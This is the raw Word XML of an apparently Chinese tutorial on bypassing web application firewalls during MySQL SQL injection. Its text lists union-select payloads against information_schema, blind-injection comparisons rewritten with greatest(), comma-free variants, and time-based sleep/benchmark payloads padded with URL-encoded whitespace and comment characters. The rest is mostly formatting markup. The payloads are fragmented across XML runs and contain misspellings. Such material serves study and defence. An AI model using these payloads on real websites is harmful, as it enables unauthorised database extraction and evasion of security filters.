          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/!12345infomation_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Schema.schemata / limit 0,1)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{括号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>id=1 union select 1,(select(schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>name)from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> {x infomation_schema.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Schemata} limit 0,1)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括号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>id=1 union select 1,(select(schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>name)from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(infomation_schema.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Schemata) limit 0,1)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同一个表的情况下，大小写字母加数字都可以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* from admin where username = 1 union select 1,user() from 123asdasdadmin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0x03 函数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类型一：常见的过滤函数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类型一:常见的过滤函数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(1)字符串截取函数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Mid(version(),1,1)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Substr(version(),1,1)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Substring(version(),1,1)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Lpad(version(),1,1)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Rpad(version(),1,1)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Left(version(),1)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reverse(right(reverse(version()),1))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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字符串连接函数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concat(version(),'|',user());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concat_ws('|',1,2,3)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字符转换 Asci(1)此函数之前测试某云waf的时候被过滤了，然后使用asci</w:t>
      </w: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 xml:space="preserve"> (1)即可 Char(49)Hex('a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)Unhex(61)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类型二:过滤了特殊符号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(1)limit处的逗号:limit 1 offset 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(2)字符串截取处的逗号 mid处的逗号: mid(version()from 1 for 1)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(3)union处的逗号: 通过join拼接。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FROM admin WHERE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username= 1 union select* from (select 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 xml:space="preserve">)a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join(select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schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>name}from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information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>schema.SCHEMATA limit 1,1)b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(4)操作符&lt;&gt;被过滤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* from users where id=1 and ascii(substr(database(),0,1))&gt;64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用areatest来代替比较操作符了。greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值。那么上面的这条sal语句可以使用qreatest变为如下的子句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* from users where id=1 and greatest(asci</w:t>
      </w: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(substr(database(,0,1),64)=64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总结:使用greatest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)绕过比较</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>操作符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类型三:部分函数构造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(1)sleep((5)/benchmark(10000000,SHA1(1))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id=1 xor sleep%23%0a(5)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id=1 xor sleep%2d%2d%0a(5)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id=1 xor sleep([%20]5)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id=1 xorbenchmark%0a(10000000,SHA1(1))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id=1 xor sleep[空白字符](5)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Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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{x 1}形式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select{x[可填充字符]1}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Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0;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%21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!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%2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">b + 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>%2d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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 xml:space="preserve">%40 @ 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%7e ~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0x04 END</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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本文汇总了一些常见的Mysql数据库特性和特殊的绕过函数，这是最灵活多变的一种数据库类型，以上这些远远是不够的。比如:单单一个内联注释，就可以嵌套多层，变幻出各种令人诧异的姿势。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E0877"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A76E0877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C488B7C8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C488B7C8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02EE796"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="002EE79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E959D31"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2E959D3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2F495F94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F495F94"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val="第%1章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  <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="3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  <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="4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  <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="5"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.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5">
    <w:nsid w:val="346D5638"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="346D5638"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:pStyle w:val="17"/>
      <w:lvlText w:val="第%1章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  <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0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  <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0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  <w:sz w:val="28"/>
        <w:szCs w:val="28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6">
    <w:nsid w:val="56FF1349"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56FF1349"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:pStyle w:val="16"/>
      <w:lvlText w:val="第%1章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  <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0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  <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0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  <w:sz w:val="28"/>
        <w:szCs w:val="28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7">
    <w:nsid w:val="585C8257"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="585C825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40E828D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="640E828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65E02"/>
    <w:rsid w:val="1E9D441F"/>
    <w:rsid w:val="407264AC"/>
    <w:rsid w:val="4E94011E"/>
    <w:rsid w:val="5FEE2F32"/>
    <w:rsid w:val="6E7466DF"/>
    <w:rsid w:val="6F60271F"/>
    <w:rsid w:val="72A0394A"/>
    <w:rsid w:val="740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pageBreakBefore/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="0"/>
      </w:tabs>
      <w:spacing w:before="100" w:beforeLines="100" w:beforeAutospacing="0" w:after="100" w:afterLines="100" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="431" w:hanging="431" w:firstLineChars="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
      <w:kern w:val="44"/>
      <w:sz w:val="36"/>
      <w:szCs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paragraph" w:customStyle="1" w:styleId="16">
    <w:name w:val="样式6"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="17">
    <w:name w:val="样式7"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="标题 1 Char"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
      <w:kern w:val="44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2024-09-16T06:28:00Z</dcterms:created>
  <dc:creator>漩涡凌风</dc:creator>
  <cp:lastModifiedBy>漩涡凌风</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-16T11:46:49Z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